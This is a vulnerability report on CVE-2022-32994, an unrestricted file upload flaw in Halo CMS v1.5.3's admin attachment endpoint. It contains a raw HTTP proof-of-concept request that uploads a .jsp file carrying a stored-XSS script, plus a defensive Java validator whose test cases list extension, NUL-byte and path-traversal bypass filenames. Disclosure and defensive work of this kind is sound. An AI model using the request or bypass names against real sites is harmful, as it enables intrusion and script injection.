CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports
Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.
https://github.com/halo-dev/halo/
Halo CMS v1.5.3 has an unrestricted file upload vulnerability at /api/admin/attachments/upload: the endpoint does not restrict the extension or type of an uploaded attachment, so an attacker can upload files with extensions such as .jsp or .html instead of the image and document types an attachment store is meant to hold. Note that the request below carries an Admin-Authorization token and an admin session cookie, so the affected endpoint is part of the authenticated admin API, and the file body in the PoC is an HTML script fragment, which would also run as stored XSS if the attachment is later served as a page.
Proof of Concept
POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--
Relevant code: AttachmentServiceImpl.java, line 110 (permalink given in the original issue).
The upload path at that location stores the attachment without any check on the file's extension or type, which is what allows the 2.jsp upload above to succeed.
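The missing check, as an added example. The following Java is not Halo's code and is not the fix the project shipped; it shows the kind of server-side filename validation that an attachment upload handler needs in order to refuse the 2.jsp upload from the PoC while still accepting ordinary attachments. The class name, the allowlist contents and the sample filenames are assumptions made for this illustration.

```java
import java.util.Locale;
import java.util.Set;

public final class AttachmentNamePolicy {

    // Extension allowlist. Hypothetical policy chosen for this example; the issue
    // does not say what Halo itself accepts, and the right list depends on the site.
    private static final Set<String> ALLOWED_EXTENSIONS =
            Set.of("png", "jpg", "jpeg", "gif", "webp", "pdf", "zip");

    private AttachmentNamePolicy() {
    }

    /**
     * Returns a sanitized base filename if the upload may be stored, or null if it
     * must be rejected. The check is on the name only: the client-supplied
     * Content-Type (application/octet-stream in the PoC) is attacker-controlled
     * and is deliberately ignored.
     */
    public static String sanitize(String originalFilename) {
        if (originalFilename == null || originalFilename.isEmpty()) {
            return null;
        }
        // Embedded NUL: some file APIs truncate at \0, so "x.jsp\0.png" lands as "x.jsp".
        if (originalFilename.indexOf('\0') >= 0) {
            return null;
        }
        // Drop any directory part so "../../x.jsp" or "..\\x.jsp" cannot escape the
        // attachment directory; the client controls the string, so handle both separators.
        String base = originalFilename.replace('\\', '/');
        base = base.substring(base.lastIndexOf('/') + 1);
        if (base.isEmpty() || base.equals(".") || base.equals("..")) {
            return null;
        }
        // Conservative character set. This also rejects "x.jsp;.png"-style names that a
        // container may map to x.jsp, and names containing spaces or shell metacharacters.
        if (!base.matches("[A-Za-z0-9._-]+")) {
            return null;
        }
        int dot = base.lastIndexOf('.');
        if (dot <= 0 || dot == base.length() - 1) {
            return null; // no extension, dotfile, or trailing dot
        }
        // Only the final extension decides how most servers handle the file, so
        // "notes.png.jsp" is judged by "jsp", and the comparison is case-insensitive.
        String ext = base.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED_EXTENSIONS.contains(ext) ? base : null;
    }

    public static void main(String[] args) {
        // Constructed sample filenames, including the one from the PoC request.
        String[] samples = {
                "2.jsp",
                "photo.PNG",
                "shell.jsp;.png",
                "shell.jsp\0.png",
                "../../webapps/ROOT/x.jsp",
                "notes.png.jsp",
                "archive.zip",
                "index.html",
        };
        for (String s : samples) {
            String r = sanitize(s);
            System.out.printf("%-26s -> %s%n",
                    s.replace("\0", "\\0"), r == null ? "REJECT" : "OK as " + r);
        }
    }
}
```

Run with a Java 9 or newer JDK (Set.of). The point of the example is that the decision is made on a normalized base name against an allowlist, never on a denylist of "dangerous" extensions or on the client-supplied Content-Type, both of which are trivially bypassed by the kind of request shown in the PoC.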